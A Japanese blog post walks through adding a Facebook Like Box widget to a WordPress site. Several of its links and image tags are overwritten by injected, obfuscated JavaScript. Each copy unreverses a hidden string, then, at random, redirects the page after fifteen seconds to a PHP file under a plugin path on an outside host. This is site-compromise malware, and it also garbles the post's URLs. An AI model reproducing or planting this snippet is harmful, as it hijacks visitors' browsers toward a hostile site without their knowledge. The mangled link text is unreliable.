Sumirexxx

今日もiPhone片手に出かけます

FacebookのLike Boxを設置しました!「いいね!」押していただけるとうれしいです

WEBツール ブログ

今日はなんだか暑かったです。

いまさっき、FacebookのlikeBOXをつけました。前にもつけてたんだけど、なんか違うなぁ?と思ったら、プロフィール用バナーだった☆あはは

お昼休みの5分でできたのでご紹介します。まだの人はこの機会にぜひつけてみてくださーい!

Facebook Like Boxで検索。

Facebook developersという検索結果が出てくるので開きます。

Facebook developersは$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CC0QFjAA&url=http%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Fplugins%2Flike-box-for-pages%2F&ei=r7xwUqrgJ43YlQXK-YDYAg&usg=AFQjCNFqfwNUyg7Skvwl1dFIXiA4TRGz7A&sig2=rcqekX8g51wCNm5ckMuvCA&bvm=bv.55617003,d.dGI” target=”_blank”>こちらからどうぞ!

このページはあとで使うので開いたままにしておきます。

Facebookを開く

Facebook Page URLという欄に、自分のFacebookのページアドレスを入力したいので、Facebookを開きましょう。

Facebookにログインした直後の画面て、「https://www.facebook.com」になってしまっていませんか?

これだと自分のページって認識してくれなそうですよね。

そんな時は、左上にある自分の名前のところをクリックして、独自のURLが出るようにしましょう。

ログイン

これをコピーして、先ほどのFacebook Page URLに貼り付けます。

アドレスコピー

あれ?出てこない?

何もうつらない
そんな方もいらっしゃるかもしれません。もしかしたら、長い間ログインしていなかったり、個人アカウントとFacebookページアカウントを持っていたりしませんか?

私の場合は、こう対処したら表示されました。

Facebookページにはいる。

左上の名前をクリックしたページではLike Boxが表示されなかったので、左上のFacebookボタンでいったん、ニュースフィード画面に戻ります。

もどる

Facebookページを作っていれば、真ん中あたりに表示されているはずですのでここをクリックします。

Facebookページ

そして、このページのURLをコピーしてみます。

コピー

Like Box生成の、Facebook Page URLに貼り付けてみてください。

表示された

今度はプレビューが表示されました。

URLは同じなのですが、何が違うんですかね?詳しいことまでわからなかったのですが、もし表示されない時はこの方法を試していただくのも良いかもしれません。

ヒントをいただいたブログを載せておきます。ご参考にどうぞ。

このページを参考にさせていただきました!

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa.com/2012/12/04/546″ target=”_blank”>$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa.com/2012/12/04/546″ width=”150″ height=”130″ align=”left” border=”0″ />$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa.com/2012/12/04/546″ target=”_blank”>サイトに埋め込んだLike Box(Facebook)のウォールが表示されない時の対処法 | 野良メモ -noramemo-$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa.com/2012/12/04/546″ target=”_blank”>$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sa.com/2012/12/04/546″ border=”0″ />

大きさなどを指定して、GetCodeでソースを生成します。

GetCode

ソースは、

  • HTML5
  • XFBML
  • IFRAME
  • URL

から選ぶことができるようです。

今回は「IFRAME」を選んでみました。

Your Plgin Code

「IFRAME」タブを選んだら、下に表示されるソースをコピーします。

IFRAME

ウィジェットに貼り付けよう!

貼り付ける場所はお好みですが、私はウィジェットに追加しました。

コピーしたソースを管理画面⇒外観⇒ウィジェットに貼り付けます。

メニュー

タイトルはつけてもつけなくても。

ためしにつけてみました。

Facebookウィジェット

こんな感じで表示されます。

さ、さみしすぎる…。

表示

手順にするのは時間かかりましたが、実際の作業は5分位で終わります!

まだだれも「いいね!」していただけていないので

どなたかしていただけるとうれしいです…☆
FacebookもGoogle+も、もっと活用したいなぁ…。

それでは、また読んでくださいねっ☆

SMRX

Posted from するぷろ for iOS.

この記事をシェアする

<